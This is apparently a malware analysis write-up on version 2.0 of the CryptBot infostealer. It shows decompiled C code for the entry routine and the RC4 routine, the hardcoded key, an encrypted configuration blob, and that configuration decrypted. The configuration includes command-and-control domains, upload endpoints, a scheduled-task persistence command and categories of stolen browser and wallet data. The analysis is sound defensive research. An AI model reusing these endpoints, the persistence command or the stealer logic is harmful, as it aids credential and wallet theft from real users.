CryptBot v2.0 - Malware Analysis

Featured image
CryptBot series · 3 parts
  1. CryptBot Malware Analysis
  2. CryptBot v2.0 - Malware Analysis
  3. CryptBot v3 (Final) - Malware Analysis

Overview

CryptBot is a sophisticated infostealer malware, first identified in 2019, targeting Windows systems. It is designed to steal sensitive information, including browser credentials, cryptocurrency wallets, cookies, credit card details, and system screenshots. Distributed primarily through phishing emails, cracked software sites, or malicious LNK files masquerading as legitimate downloads, CryptBot has evolved significantly. This analysis focuses on version 2 (CryptBot v2.0), which introduces enhanced evasion techniques, refined persistence mechanisms, and advanced data exfiltration compared to v1 (see our previous analysis).

Key updates in v2 include revised RC4 encryption keys, improved anti-sandbox checks, and the deployment of backdoors such as NetSupport RAT. Recent variants, often referred to as “Yet Another Silly Stealer (YASS),” show code reuse with other stealers and employ complex, multi-stage infection chains involving PowerShell, JScript, and Delphi-based loaders.

What is RC4 Encryption?

RC4 (Rivest Cipher 4) is a stream cipher designed by Ron Rivest in 1987, widely used for its simplicity and speed in software applications. It operates by generating a pseudorandom keystream from a variable-length key, which is then XORed with the plaintext to produce ciphertext. In CryptBot v2, RC4 is used to encrypt stolen data before exfiltration to command-and-control (C2) servers, making it harder for analysts to intercept and decode the data without the key. Despite its efficiency, RC4 is considered cryptographically weak due to biases in its keystream, which can be exploited in certain attack scenarios.

Analysis

Activities

Programming Language

The malware is written in C/C++, as evidenced by low-level Windows API calls, string handling, and memory management patterns observed during analysis with IDA Pro. Dynamic imports from libraries such as kernel32.dll, wininet.dll, and crypt32.dll are resolved at runtime, a common technique to obscure functionality and hinder static analysis.

Static Analysis

String Extraction

Extracting strings from the binary reveals key indicators used for C2 communications, as noted in our previous analysis. These include:

UID:
UserName:
ComputerName:
DateTime:
UserAgent:
Keyboard Languages:
Display Resolution:
CPU:
RAM:
GPU:
isGodMod: yes
isGodMod: no
isAdmin: yes
isAdmin: no
Installed software:

WinMain

The WinMain function serves as the entry point for a Windows application. It is responsible for initializing the application, creating the main window, and entering the message loop.

WinMain_Function

The following code snippet is an extract from the WinMain function:

int sub_404460()
{
  int v0; // edx
  unsigned int v1; // ecx
  int v2; // eax
  int v3; // esi
  char v4; // bl
  int v5; // ecx
  int v6; // ebx
  unsigned int v7; // edx
  int v8; // esi
  int v9; // edi
  int v10; // eax
  int v11; // edi
  int v12; // eax
  char *v13; // esi
  __int16 *v14; // edx
  char *v15; // ecx
  int v16; // ecx
  __int16 v17; // ax
  const wchar_t *v18; // edx
  char *i; // ecx
  int v20; // ecx
  wchar_t v21; // ax
  void (__stdcall *v22)(int, _DWORD); // eax
  void (__stdcall *v23)(int); // eax
  void (__stdcall *v24)(int); // eax
  void (__stdcall *v25)(int); // eax
  void (__stdcall *v26)(int); // eax
  HMODULE *v27; // esi
  int v29; // [esp-4h] [ebp-20h]
  int v30; // [esp+0h] [ebp-1Ch]
  int v31; // [esp+0h] [ebp-1Ch]
  int v32; // [esp+0h] [ebp-1Ch]
  int v33; // [esp+0h] [ebp-1Ch]
  int v34; // [esp+4h] [ebp-18h]
  int v35; // [esp+4h] [ebp-18h]
  int v36; // [esp+4h] [ebp-18h]
  int v37; // [esp+4h] [ebp-18h]
  char v38[8]; // [esp+10h] [ebp-Ch] BYREF

  Sleep(5000u);
  strcpy(v38, "oSabnN");                        // Key
  mw_rc4((int)v38, 6u, (int)byte_42FB58, 6500);
  mw_rc4((int)v38, 6u, (int)word_42C888, 13002);
  v0 = 256;
  v1 = 0;
  v2 = 0;
  v3 = 1;
  do
  {
    v4 = byte_42FB58[v1];
    if ( v4 == 10 )
    {
      byte_AF8F50[v0 + v2] = 0;
      if ( v0 >= 261888 )
        break;
      ++v3;
      v0 += 256;
      v2 = 0;
    }
    else if ( v4 != 13 )
    {
      byte_AF8F50[v0 + v2++] = v4;
      if ( v2 >= 255 )
        v2 = 255;
    }
    ++v1;
  }
  while ( v1 < 0x1964 );
  if ( v2 > 0 && v3 < 1024 )
    byte_AF8F50[256 * v3 + v2] = 0;
  dword_B38F50 = v3;
  v5 = 0;
  v6 = 1;
  v7 = 0;
  v8 = 256;
  do
  {
    if ( v7 * 2 + 1 >= 0x32CA )
      break;
    v9 = (unsigned __int16)word_42C888[v7];
    if ( v7 * 2 || (_WORD)v9 != 0xFEFF )
    {
      if ( v9 == 10 )
      {
        word_A78F48[v8 + v5] = 0;
        if ( v8 >= 261888 )
          break;
        ++v6;
        v8 += 256;
        v5 = 0;
      }
      else if ( v9 != 13 )
      {
        v10 = v8 + v5++;
        word_A78F48[v10] = v9;
        if ( v5 >= 255 )
          v5 = 255;
      }
    }
    ++v7;
  }
  while ( v7 < 6501 );
  if ( v5 > 0 && v6 < 1024 )
    word_A78F48[256 * v6 + v5] = 0;
  dword_AF8F48 = v6;
  v11 = sub_40EE70(&unk_A7E748);
  v12 = sub_40EE70(&unk_A7ED48);
  v13 = (char *)v12;
  if ( !v11 || !v12 )
    return 0;
  v14 = (__int16 *)&unk_A79348;
  v15 = (char *)v11;
  if ( *(_WORD *)v11 )
  {
    do
      v15 += 2;
    while ( *(_WORD *)v15 );
  }
  v16 = v15 - (char *)&unk_A79348;
  do
  {
    v17 = *v14++;
    *(__int16 *)((char *)v14 + v16 - 2) = v17;
  }
  while ( v17 );
  v18 = L"\\Desktop\\Invoice.docx";
  for ( i = v13; *(_WORD *)i; i += 2 )
    ;
  v20 = i - (char *)L"\\Desktop\\Invoice.docx";
  do
  {
    v21 = *v18++;
    *(const wchar_t *)((char *)v18 + v20 - 2) = v21;
  }
  while ( v21 );
  if ( sub_40EF30() || sub_40EF30() )
  {
    sub_404850();
    sub_404850();
    return 0;
  }
  v22 = (void (__stdcall *)(int, _DWORD))sub_410740(52, 295, v11);
  v22(v29, 0);
  sub_40A910();
  v23 = (void (__stdcall *)(int))sub_410740(52, 402, 300);
  v23(v30);
  sub_40FA50(v34);
  sub_40A8E0();
  v24 = (void (__stdcall *)(int))sub_410740(52, 402, 600);
  v24(v31);
  sub_40FBF0(v35);
  v25 = (void (__stdcall *)(int))sub_410740(52, 402, 600);
  v25(v32);
  sub_40FDB0(v36);
  v26 = (void (__stdcall *)(int))sub_410740(52, 402, 600);
  v26(v33);
  sub_410320(v37);
  dword_4ACEB0 = 1635017028;
  sub_404850();
  sub_404850();
  v27 = (HMODULE *)&dword_B39768;
  do
  {
    if ( *v27 )
    {
      FreeLibrary(*v27);
      *v27 = 0;
    }
    ++v27;
  }
  while ( (int)v27 < (int)&byte_B39968 );
  return 1;
}

RC4 Implementation

RC4_Implenet The WinMain function references sub_404460, identified as an RC4 encryption routine, renamed mw_rc4 for clarity during analysis:

int __fastcall mw_rc4(int a1, unsigned int a2, int a3, int a4)
{
  unsigned int v4; // eax
  int v5; // edi
  unsigned int i; // esi
  char v7; // bl
  int v8; // esi
  int v9; // ebx
  int v11; // eax
  char v12; // cl
  int v14; // [esp+8h] [ebp-108h]
  _BYTE v15[256]; // [esp+Ch] [ebp-104h]

  v4 = 0;
  v14 = a1;
  do
  {
    v15[v4] = v4;
    ++v4;
  }
  while ( v4 < 0x100 );
  LOBYTE(v5) = 0;
  for ( i = 0; i < 0x100; ++i )
  {
    v7 = v15[i];
    v5 = (unsigned __int8)(v5 + *(_BYTE *)(i % a2 + a1) + v7);
    a1 = v14;
    v15[i] = v15[v5];
    v15[v5] = v7;
  }
  v8 = a3;
  LOBYTE(v9) = 0;
  LOBYTE(v11) = 0;
  do
  {
    ++v8;
    v12 = v15[(unsigned __int8)(v11 + 1)];
    v9 = (unsigned __int8)(v9 + v12);
    v15[(unsigned __int8)(v11 + 1)] = v15[v9];
    v11 = (unsigned __int8)(v11 + 1);
    v15[v9] = v12;
    *(_BYTE *)(v8 - 1) ^= v15[(unsigned __int8)(v15[v11] + v12)];
    --a4;
  }
  while ( a4 );
  return a3;
}

The hardcoded RC4 key is:

strcpy(v38, "oSabnN"); // RC4 Key

Manual Decryption

To decrypt the configuration, extract the encrypted blob at byte_42FB58 using IDA Pro:

# In Python terminal
get_bytes(0x0042FB58, 6500).hex()

The extracted content is as the follow:

0ae1c014fd525c9abc29f0cb6a08fa02f8219eb96119adfc96bc62132f83a5f72714edc1b4cedaca944927153768e0272496fb9f25b51407399afdd209b2a6c8cd0613d9f9006a4aa5df9eb1d777b65a5acb44bf63330351396de1ce777944639e0e6a0f32562a68181e2614a4ef702303d102e18c3b1dab678ef6386696613d292511ce79be9b9b976d2a7141fd45f1a730ba912e350f5120e96cf10ec6126c2bceb8905577ae59325a26468398b4bc10120fffffaa8ea108bf07321ed525da376a0072d8597430c0ccf50402ce5308a09bf2af7fccdb217228a017155d016317a9b4c16183a4e86f8d5022204f5a19cb7778f06fb224bb1336e6ea7466a24f3c9b7f0f960c777265449e50e809b5212a9b4fab102a3a4be16382d62ff0ee5db6a46d5278f5e3a6b593f21834c2859363abaa0a12d780c568c2f97eac4c7a097fedfea646d7ca3fb40c358cff66e812773f44e0cc0678439406c3941b872744d0dabc35d88a11e36e8e796c32291bc8599d9b645d9d6ce83680431801dd3a3e50521849597f078ae5989b89444318460866d9e4531878e64825621c76e0de2f0739b30e39d3d169af7c5093cb9e731bbab764b621c5afe3b7b4053d0eae1ec2a0552a6df33b04ebf9089da472af0eda39daa60b9c88b73940b4b43c04447b084f6020d92e2e5a59e4062ce9f1cf801bf4664cbd5e2670fc80ca7a704ee15a86032e673040784285b424259b9eeab6d1cf75bcdd2dcb5be874ae8de2a1ca607538a0d33ca7872a519beebaf58adf0ea49343c6cb4d9d982d19dfd5c65cfb14b0520d34eab8993071a4ad3398d8004f9464e19ca0590ed190d2a031f8e243aeb20359ac5ecd36ff78a348b4e62a1683550af5f7be46b5d16bdb969aef6e2afb7ede912f6d4925d7a550017ffbe6adde3321f6f47e4a7eaa05ca3580dbe4c9073679a2ee456339522b45cc7fe755e0fdaff22c51adf5366d9b4c42a77d1d46f1f0e64b78e16e36224303e7d5af5cd83a61b33cb4a51b60cf1d4afab30ff9a707d27746cfbbfa694aed22c158ba9260981fb2dacb8709fd37f765545830e1f91936514f454d99b7e34f8060492dab28622b3fa8b1a8e43019f48cb56cdc45643b1bf8f537b792308bb775c246a965cda6ffc99028708aaf481ca09fc6601ffcd6aeb066855eeb806c96f8d9146f46630c6b8b2d989802720f19495c334f2103c7c9baaa7b1af32751817428b4c498485d66a17729f35600427af552d61009160c85dd513e54870f4ffb29f80c9595d51be3da1b6f7eac0780b2b16f7691390df0877a06b82e887e099ec26ecc5a0116fe3782f8da72e04ce7f8af03e9928b639405ac525cce8a0f9bab379f71b8dc8e80a3e81b6cdbc8828469b3b834393c25fc8f3c5bfe22d7b64b51f249387e147f23bc913e9c25176e83347b154c4e978d97a3ebed48c7b8bd628a3068f8cd06b4a1eaccf48f6c0be535f0b0c3c9a2e8c7256df46cda6c85faad4e82a43b3609aac8a7abddb91952b0301eb7e0be8a42c4533543ae67cc306dda3899fead163b8c4856a896a7e03a7a2c9c82fd949f6d3c9f12bd330ac96d0a54976d07bec454a1fb51f5cd295b537286ce5f76d87a733360289b63372203476aca44f9c6c1498f5edff4887a9cbfcfb1156f0ec7c693b4665908638f0e8a1d6b3eb34966e1dd9590bcd197e78fbcc0af009a4dffcc0585797f8fb55de4bea48fbe9b960fc2b8bd0faac8de75359dc51f1ce1412c166f5e414431f590bbf8a9e02facb49b32a35a26ece4859b075283eaac5af6f9e99ea6f337a5f5b33c4cdb5a60eac4327b88fdd0e019d1f923f722bc391fbf814059859864e1eeb3de18e262120b482e6c4e86c1469a5912fad2468e215b8957538ca507358b7fb9e3664dd0eecb844c2a30de1e4d64ef8a781972615c803d4f997358913c3bceec4c449732d9e5281460f6e4d833d634f82b1cdd45b2d2a648926c29b267e0af8720509432c513e83ea144f3d986cdc1597df5a506f34f895171356acb52304be356eedb8e57db58a9f773ff5858cfd2899ba05013ae25284df2e7f97aee200ab5d32d3eb696fbc1720de9fd218580190c55c50159aed76211adc0bdd7ac37cc7cd1e7836cdbe1f86b030c2670f9bff06713ddbfe1f387700483f5651df67be4bfb633f6bbce20288e16f79a6597cde77559133288d202ad47bbb1a6f201afc18109819fade6d46b05541f13c8503dcca25d46ac19241cf8ec3c1299e5e0357a555ee215d897af43035ccb18dafc7fab9509ad71260d09b7c271913aae0aaf3545ab21d70a895c2cf855423061d5adffb262f6ff3ba801fb47661a0ab7398ec4cb573028a3c197c0dd3c1f0b4ca1034ef9295ec5ed800f3f18bc9122fb099854b6c0c6fa8ef14cbc3db80b19b5c9871ce9451aea2818422990e66ee8f12ebc4f21c772f07cfd118187603c2c8ba8a002c4e1a599d467303c2bbe1e24d55a72d0da9bd0a2cfc72efbfd2bc3e9cbfeb85f75148cc4d29173a4b172f9812ee299f3202e68ce566e140c0a02f4f98cc1c5049586a64761a1427ba0227ecff07dd97c4fbddc8c224163469f0f2cf8b1177d6f46bcfe25c4969d4eb6f4b5855394ab24f7192512971b988f177cfcbd86740d9781f09c570afdad40c378482ad5d79dce48b7a77adb96d6500dca693a4b5723e05f492f02ed6e488f5b99a829354ada07ed5b6eb04216e4091ac110ea67624ad26677c48a082ca260fd97a779056b88a9ded032fdac2d1dbab871332b2f5bfd36f706b32d28c02d47b6320d3f87aab45ebf0558260972eed55fb2b04876effc2b48b14f8a3418822d0973ad2695e91e7c0fe918bf4904b0e44dddcb81fc4caee5b9927f59c5ceb4e8495bb77b30f4b8c8d168a5d1791e72f2cbe6deb3b91c27619ba79e315891b973cf9b46faaaf406f01062b5442b4ad8749d67990880bb508e27cf68e436e2cd4363aea35492bc1227035c19ffc2b7cbe928ed11345a33de62d55d60858bd086744519f46c905446ed0b4f62ea8d802660df4ca95224fe9b5f559abf989250f6e5d30e79d29088737ce0d687b2c186bc8b42a43771b7761104d21e26165f03e398a56cf2e73cff17c62556b92e3ab7070e194df6edbcb08f77d47c7a8058626f31f9b63323335399e6209c41e801d7235014e592d8ab950cb848eb641c563fb7e8ff3c6aade327add28d05c303ed39921914c924530a92654bc253fd98da1d353552ee25271c1dbc1285d9f383faf9356fe45f4f7c1450d0972fd00523d625c4d82f7f43207266b10592370945f497e799498c2a73580f47dd6b5ca227b0fe64e7bc78dcf080448ac6d457f56c858147de82051635d7708f195df752ccf42b1c6bdc94c528fc2eeb78fa8f296ef2dcfed5fcad8222627b9fb62026720529c95a95d07bd0bd54dcddb2d0f196f8869d49e2cd78cce90cf315ff31341ff938e83bf1a92be5c93ceef8ac6ff22c6ccbdcb7bb2326c7b9d1596837f976f4b7683ad483cb6b6008938553d5d8948664bd4f7d64c427de276d4053b40314c60cb1b654e347d059d7c27c38e2065c52d7052996a2af71cc711db42cc2f61b1676556e3c5f542f0e977de76da19d14d80ee867fb4adb14b59174d741b2d365afeea9f08960b8eab656e34d8d136e9e7d348f79301eb31cd0d9b61b1311064d262c3d11f0f7dfa59a08bb90be9f97135bdad4f46705cbbeb2efc6e73e2ee5edcb46e994a055fca7d5fab7e0ac2a8622184b730e04dc2301fc183cc0d208c46a6c4f5aa4d29f298df909d8a41489d8f0f6bc6cfd44c33733d1701c908435b10c979a4729ca190073a6ad0045505266205da67494cd2b44b02762a778b025ea348e902448547351295be7b6f547b462c26c7172b83a30cbe835cddb05f8faba81adacd572f47b02cb764e29670063986784511afa66b78eac103e53c82d523610a55b949dda3aa0f4704edee903d8368756ef67637ae70e01d3888f0fa76135a1e284c7a91eff461fb72a03655dfaf15b2fc620f33dc4a93de4a2749a42a5463cc949ef901be75cb1133d8741ecf210960375a4f7b97e7ca331d663121e728910300085ee0aee4e25f94c97263340ba89540f44893a13c8991b6f0ebb224286d7555164bb6b0cb9077fdcf0d1c6c320391e6623d5ed70fa97bf9d0cbfb5c6219ff3b321af65f92e8b5365cd0cf9cd859e744a7fbd416a28c5806a0a3ff5e9df108606d90d838d34bd8fc5399611db4c1794f0a162fac3df35d6f5f55a69c1b1dee9f333871f4111be37af9701bba4f8dabc104603f7b50e7b970120c975a0ce1a40fbb2cf5a3a4e2e8d95283a0832c442bbbe54748510900b23fd1fde3c00281b1ae1231f56084fcb74b4c46578aa66ad5b9fbe71fa5316bb0d7b8252c6408525f907a4e140b6803c43f8e4cc82e5f95135ab8c0b4a0d5d9635378e4614190b5ae1dbc15b86d7f3e3acf5473815626b715b27fd8d9418fdedc4f91441b7f6af9cc5e47a573870aaf5dd81d424013ff09daab5c98a05c4900acd7ab1f5226f519d4136c3866f6f2c8db44c09a8374935f1dc4d3bcdcd4bcbbb160e2fd8bc640fb01843900b83d55d6eebb527aba0baba4fb7be6718a331e835ab296ddeecaa2046dd6237668b366de8873b713e77fa28932f7cd15c2d7af9d1d8b501252b00bb588a8857b55d6ba75200eff946b54b897a0c3695fc90787bf8059fe564aa3df643e52c4d0b2457733e94249f4963f9c0e68189c57e90cb84a6d97fc425bb290c4444ad8b4134d8f39a42a653370d0ad106408ffe5c2000c1080b8b074dafe11fdb04c4eed44a4102d2d82db63773f66ccd15b8809feeefa40b968e19670e9cb561b784d6a707b044017d1159fb2530f5c8fb93322b1c81be13331586ccf2b4b725935f4b0c80205ca616f3d9e62f5322b1df7defe4107e79e415a509b927f3e04a0cffafe67361baf1d8a39ff7a674059fa2738a274d9aba8b1d505ea88bf0b05916d7c72a6c62f7b6bee708b0879b0d40944bed342a29431b335147a27b85b56f12fe38551ada6c42bb72affd34ebe63a2e00989000be2cfbe797a862a1eaf432829e4331fcafda3191ddd529057c27903f380ee1b70b2fb676fc53cbd131ddd82daab74df42009799d40f9ecfe5af0612d96e36b9b1a62e65300ca47056ac3f18c6624d2d1d36103868c3e70453351e82cd09853143ab13b03cbeea79d7406c73632bb95c0fd05e54c6dc2bc5bfcc755163794e30e05deb75f3b2332b6675ebdfc3607368a54a539434f557358f9ef2e97cf34a29f19a8aeb6d755345acd3bf173f8082781b0b0a81ff0e0c78002a7c704ddc68302b73a9955c5b7104b105ea160b19801fbf63ede333cba70c16b00d408991062b09753206e33c61ac572b1f2a58bfb2e7bb92d895c7ded5b7ae03c260e6330bdc373ad7297949957f89e14ee34c4f9498454cc7289498d5bd359d460ca4ae5c19d626189c72f728ed993249e2717c7c1813cbfc5f33da7a7403354d9a555c7030c30c4e764193210aae16474cac01f84323239f3bb2fe828d1eef1ddb53e3bc54c7562047d9b9326e8b92a28df9558e9c3b642e469c1c6f804535686d9ad4aea136fe948c00a9a7c07ff9f20291db2f046b1448dc4023cefdc256528fdfef47d55a5f9d2c5f4bbee8b8084e58048564367cd1cd1f49726716ab74595c8f6556693d7f08dc7c7daa638783879a6e627b4a0f55c07fbeb95749d62733d810435859d9630d20e5c5751d1dced33aa44ca071d0e4f810f7cab5174503b1d95efda4f830874e21893f31efa0a1ec05b2d7758372c5c1329a28d58304fa5342355c75769d3d11abed9e40520704a85f78fbf4b8711ebf2d6cacce73265c2a379c5d37004580cd9fe66c68815dccae9999280d4a8891cc85e3b3e7cffec77233cb5a02fa3640a108e288b75e0b2d9bb985fe9bd2eccd0ed7dcddcdf3dbc33f336b9a5603c25b01b555b073ce7802080c0de3669ec7fdb4208144489a407a659c07d88fb446ac22fc300dedc51e7d250dcb5f752fadc4e0fa1b8fedde76c9a0b659cb2acf13d77338b4562b00aa6818b5ae8cb4af14c2a4c8d765cbfc5e9d14350550da4dc045fe0690a75e8ed750ceeb8f4d6ab98a185c08d3a26a8f53c2fe9e2bad3718a675889afdf25a5fe8d2215d87b112a3554a1d3c532500f4c36eb0c661bcc0dce12f9012e1bdfdf0401627f2c31ca3f7d3020ea11aa4f8360e36977369e76d222765e63c330f6aa0f96b7cc386f626f3af43b26358d32fd82857e4b7749da17f55bf9d5f3a1d29d1623600b6c3d91b23d3d30d614a4f61d3633bdb15f84f42e4b45c68701219ecfef3c5befc8470a14535300c332e2506b8268719f06b73ec7e35cd043bb7ad3418cc172382a373ad52b7f671f04360c236032211521743a6bca143c9b4429a4d75421becadad783cce9f89024ef72ffe5c6803df406e3dbbdd690b9c0e7dd6b4c206bdbb2261c8d47ccff1bf8fa82753d19576fc43636f68ed506cc84affcc5bba72c45e12907224e4b6b3f2d4b4fedc79937cd33c7e89113441982cb512bdee23ff28956be14061135c23651fe69ad6da76c87a45d66e519d28d2be900492d8f74944debb7968f8d20b9729d4a45e4bda28ee202c271b648c08541f8d0bc1a3fb14be308ee6f226567b63f9e554dfa99b11610bb9828b1ae1866cbe340c07304533abcf6feb7fccdef25f5c40d75061e7faaf7f3da4991ff97aa6b8193aa1d423fc1e83e7cc19fcdc33b955ee09d61fb0aa55b635b3b16e1dfc6373d5b45199add20b413ca7f87e8ef310c8f6f7e287b0579630e33365aa193595b95a12d72073db7b581079935cefa2c8839f1d5d74c97dc42d0b74dac459abf4feca1db0ad274580a2a814f7f64121f0a844700bb4fff0bb60037e377ecdfdad6a3735707f152e585272bafd700c2a9be882c761774ab38a25af2c0449cf2e72e809be8bd50e9be01d967ab19daf130e7802cbfbc281329a2b859ce4b1a9492dc470c076611d3f0b24704e879ca0187ffc8a75c69687332b32e6a35b1c53867e3dc9e6dc7d88613b052b3786dbf6a6e1bd8cddb7c817fd39f0926d6f8ceb5fafc2ee550f4f50c6979aa85ab3867816345fe8217751dab1d7755b6539bf5e53b5fcd488ac5ba410af9c4b55ca8d04306d43d2141486ed7e683af5cf1d80dd2b8babe8fbcbce3975c6d2f9f9e5ec748d0d973fd42db827de61c2522e4dce1ae288065aa72a6dc48be37802676b6ddc4bbfdfd18ccb355aef5ef83d0e9ed64ef4988cf5888d3cb4b0d23b674f614116c4d27b762cc1bf5fec2fb4bb896ff60ffefaadcc89563dc68585d440f4fe2734906aedbc88918faae9e0292443ac797b4854f589a77eca74ef3520719780c7ba2af0f6a63137f4a83ad427bc1a68b78eb3f90f5a061d7b343c546a5f8ee35073063b0ef2f8e34bc8160e47ce7c47035ebf72119a475d5ecb1b3cb1740aab1cbfa1c76ba6911f09e6b9ee3d9c889e335902e8ed2dfd3bb9ad8d6603c0e509387856a7bea4871f3f2dc16c5b6c15b42613c7e0cf0ffbdbee74823b7b2a8fe8ea7a7b91c2ff6dd1316ed1ecf7dbc35e4787d6fd27a1c7fe5766760d2ce6c8f4dc6d48c7fc14c74696e34a55c7d9e20e60cb757b861f0c774030ac51238420b50aa0af803739cce9de9c49e9cb4b51ffec6b83436ed0125ebecf22462c115f36f170d87bd957b0aa166c18fd5de3093e798406260fe12783764c9f54c414963c6c70b50eaf44c1f5e58aad2f013f2d49f23370f63096418f5e5651f0d0131d0b33cfe90bdfdf5f5e889b6309ccfe457505dba3904e9725ee9e924c2dcdc23aaaa07640463fff072b6c2fceeea7ea9b5644eb57f3d3d0b3b7981bf59fc3b2e9a428aab5a05c0f0abf1fb4044ba169f95fb3483b2f8932d3a169e9950378c2ade77f0df6bbcc19efff446550c784ffd7842cb470628b94e05f19b5b158fcdda260a4406048f163bf7422b115c0e1eced3619e88422bfafd03f115c2daa1ef6ba7dfa3cd073fb7668e0b09fb9c89da17a78bfa373fa7b0032984bcc72fe6e10bdeb879f930fed1904524e289f14e37f253e66241fc50421e1573fe964ede8b5860967e750a3724ed97874b56bb180730dfb4b82d7d3ae49da068a68cce569d3259c2676dd71bc5ae6817d1f436aea174db1d6eaea78777cb83dc2df48f8244aa1fd3fe0ffc246cfe1424e6bc576a8ec5889555c6994825eb1fb975d69023dcacf014f05b025efc9e19cc832acb44bae6e845c948103380d18dcb2e31f87b72661b3efba2cb563ae6efe32ed8a1b27e6569723d9af28cfffb7e5a2aecc9bd63ef184461405e7424d09278078b3fbb512fa3ae8d9b933709487b8d6772cf486c4d2eeb0540cf713f6aab066ed41b693de9a5a2bcebcaee2eb436a19aa3917b1bc7245e8c0b5bb7a6d6b34b37c9f1bb17bef3108a16263d8deb2e60a38e8db496ecb1d03cf3bdf9e70eb7444d7c936c1456241a181911442e113c29acd33d202db6f760c24bce0e028e2855349303b19779c6e50196fe25e2ca9bbba96280bbca06e2431afcda3eb7856e1f64e37772a336d14a9b5c79d0b915d78bfe431d86616fe121f83d6d33516ec4339f74eda5cc4ba13b9a3cc5100f8597988fd15dbda0b2bc30ea2835500bc79589e2dff8c797dc7721edb54dfe78b1a293274e8d5819a77b5610cd5b97f7cb00feb9a8e314000f754c9992b331cc4c0bf79de4edd8fdd458fad42a749cda478a0a2d44dab6dd33c1727824700beeb20faf263269e4736ba22e907b50605af421b0e01ed7116f9bdaa1ffb525f1b23981856c0cfc4709af4f955bef21afd0197a4227fda43cac7175206f21f0639c856642af4bf0c3406c3cb51e2f7cb414ad39348cc530699a727e9e5114babc11bff0006ff15f5b2a2bb10ee666af9515b9164384ba4188046a519d096004194c6afcced0ebf54d843daed4140444727520e1ee1c2a665ff3111dbf8fe17d5ee6f340404e48aa2a607bef46f308f3a3e5f915c0401b0df82100823150a9caee05a1b927c0018b563e55857c65081d47372f9cfd97f55501e4d7a632afdbd8d98cf7a3242aa5bfff636c5783bf6e46fa208cce7b186d60e6b2ff66463420fc101f8fb5d6c37f8bf9415a4166c5b247e55decc695c02cebbab7

In CyberChef:

  1. Input the extracted hex content.
  2. Apply the RC4 recipe with the passphrase oSabnN, setting Input to Hex and Output to Latin1.

Decrypted Config:

gceight8vt.top
\Winodukec
oSabnN
\ServiceData
\ServiceData\Clip.jpg
\ServiceData\Clip.exe
/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
GET
POST
/index.php
/gate.php
/zip.php
/upload.php
curl/8.0.1
NULL
NULL
NULL
Content-Length: %lu
HTTP
HTTPS
"encrypted_key":"
DPAPI
DISPLAY
$CREEN.JPEG
ScreenShot.jpeg
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Apps
Browsers
Files
Wallets
UserID.txt
Debug.txt
End.txt
log.txt
User's Computer Information.txt
Desktop
Others
NULL
An error occurred while starting the application (0xc000007b). To exit the application, click OK.
System Error
NULL
ComSpec
LocalAppData
AppData
Temp
UserProfile
NULL
NULL
shaverma.site
NULL
kernel32.dll
ntdll.dll
user32.dll
shlwapi.dll
msvcrt.dll
shell32.dll
wininet.dll
winhttp.dll
ws2_32.dll
urlmon.dll
crypt32.dll
gdi32.dll
gdiplus.dll
ole32.dll
cabinet.dll
advpack.dll
advapi32.dll
rstrtmgr.dll
winsqlite3.dll
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
NULL
GetModuleHandleA
GetModuleHandleW
GetModuleHandleExA
GetModuleHandleExW
LoadLibraryA
LoadLibraryW
LoadLibraryExA
LoadLibraryExW
GetProcAddress
FreeLibrary
NULL
MessageBoxA
MessageBoxW
NULL
CreateThread
CreateRemoteThread
CreateRemoteThreadEx
OpenThread
OpenProcess
GetThreadId
GetProcessId
CreateMutexA
CreateMutexW
ReleaseMutex
WaitForSingleObject
CreateProcessA
CreateProcessW
ShellExecuteA
ShellExecuteW
WinExec
NULL
HeapCreate
GetProcessHeap
HeapAlloc
HeapReAlloc
HeapSize
HeapFree
NULL
VirtualAlloc
VirtualAllocEx
VirtualFree
VirtualFreeEx
VirtualProtect
VirtualProtectEx
NULL
LocalAlloc
LocalFree
NULL
calloc
malloc
realloc
free
NULL
CreateFileA
CreateFileW
ReadFile
WriteFile
SetFilePointer
SetFilePointerEx
GetFileAttributesA
GetFileAttributesW
GetFileAttributesExA
GetFileAttributesExW
GetFileSize
GetFileSizeEx
CreateFileMappingA
CreateFileMappingW
MapViewOfFile
UnmapViewOfFile
CloseHandle
NULL
SHGetFolderPathA
SHGetFolderPathW
GetEnvironmentVariableA
GetEnvironmentVariableW
ExpandEnvironmentStringsA
ExpandEnvironmentStringsW
GetModuleFileNameA
GetModuleFileNameW
GetModuleFileNameExA
GetModuleFileNameExW
GetCurrentDirectoryA
GetCurrentDirectoryW
GetSystemDirectoryA
GetSystemDirectoryW
GetSystemWow64DirectoryA
GetSystemWow64DirectoryW
GetTempPathA
GetTempPathW
GetTempFileNameA
GetTempFileNameW
NULL
URLDownloadToFileA
URLDownloadToFileW
URLOpenBlockingStreamA
URLOpenBlockingStreamW
CoInitialize
CoUninitialize
NULL
WinHttpCrackUrl
WinHttpOpen
WinHttpConnect
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpReadData
WinHttpReadDataEx
WinHttpQueryHeaders
WinHttpQueryOption
WinHttpCloseHandle
NULL
InternetCrackUrlA
InternetOpenUrlA
InternetOpenA
InternetConnectA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
InternetReadFile
InternetReadFileExA
InternetCloseHandle
NULL
InternetCrackUrlW
InternetOpenUrlW
InternetOpenW
InternetConnectW
HttpOpenRequestW
HttpSendRequestW
HttpQueryInfoW
InternetReadFile
InternetReadFileExW
InternetCloseHandle
NULL
WSAStartup
socket
htons
inet_addr
bind
listen
accept
recv
recvfrom
send
closesocket
WSAGetLastError
WSACleanup
NULL
FindFirstFileNameA
FindFirstFileNameW
FindNextFileNameA
FindNextFileNameW
FindFirstFileA
FindFirstFileW
FindFirstFileExA
FindFirstFileExW
FindNextFileA
FindNextFileW
FindClose
NULL
RegOpenKeyExA
RegOpenKeyExW
RegQueryInfoKeyA
RegQueryInfoKeyW
RegEnumKeyExA
RegEnumKeyExW
RegQueryValueExA
RegQueryValueExW
RegCloseKey
NULL
wnsprintfA
wnsprintfW
StrStrIA
StrStrIW
PathIsDirectoryA
PathIsDirectoryW
PathFileExistsA
PathFileExistsW
SHAnsiToUnicode
SHUnicodeToAnsi
NULL
wsprintfA
wsprintfW
_snprintf
_snwprintf
swprintf
sprintf
_swprintf
sprintf_s
